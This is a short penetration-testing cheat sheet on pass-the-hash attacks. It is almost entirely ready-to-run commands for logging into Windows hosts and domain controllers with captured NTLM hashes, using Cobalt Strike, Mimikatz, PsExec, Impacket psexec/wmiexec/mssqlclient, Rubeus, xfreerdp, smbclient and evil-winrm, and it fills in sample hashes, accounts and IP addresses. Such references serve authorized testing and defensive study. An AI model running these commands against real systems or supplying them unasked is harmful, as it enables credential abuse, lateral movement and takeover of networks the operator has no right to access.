Pass the Hash

Using Cobalt

pth DEV\jking 59fc0f884922b4ce376051134c71e22c

rev2self

Using Mimikatz

sekurlsa::pth /user:Administrator /domain:exam /ntlm:215110115b118cbc2377573e95fca7a1 /run:cmd.exe

.\PsExec64.exe \dc02.exam.com cmd -accepteula

Using Impacket psexec

impacket-psexec -hashes 00000000000000000000000000000000:ee0c207898a5bccc01f38115019ca2fb [email protected]

If having issues, make sure to add domain, DOMAIN/[email protected]

Using Rubeus.exe to request a ticket and load it into logon session

.\Rubeus.exe asktgt /domain:final.com /user:adminWebSvc /rc4:b0df1cb0819ca0b7d476d4c868175b94 /ptt

Using xfreerdp

apt-get update
apt-get install freerdp-x11
xfreerdp /u:Administrator /pth:f99529e42ee77dc4704c568ba9320a34 /v:172.16.229.194 /cert-ignore

Using smbclient

smbclient //172.16.123.105/attachments -U DEV03$ --pw-nt-hash f105d2dc9ff79451223299cdfba16834 -W company.com

Using WinRM

evil-winrm -i 10.10.122.15 -u Administrator -H 564aa74ea05a4b959bc84238351cc30e

Using WMI

impacket-wmiexec -hashes 00000000000000000000000000000000:543beb20a2aAAAA714ced68a1760d5e [email protected]

Using MSSQL

impacket-mssqlclient -windows-auth internal.zsm.local/[email protected] -hashes 00000000000000000000000000000000:543beb20a2AAAAA14ced68a1760d5e

Last updated 1 year ago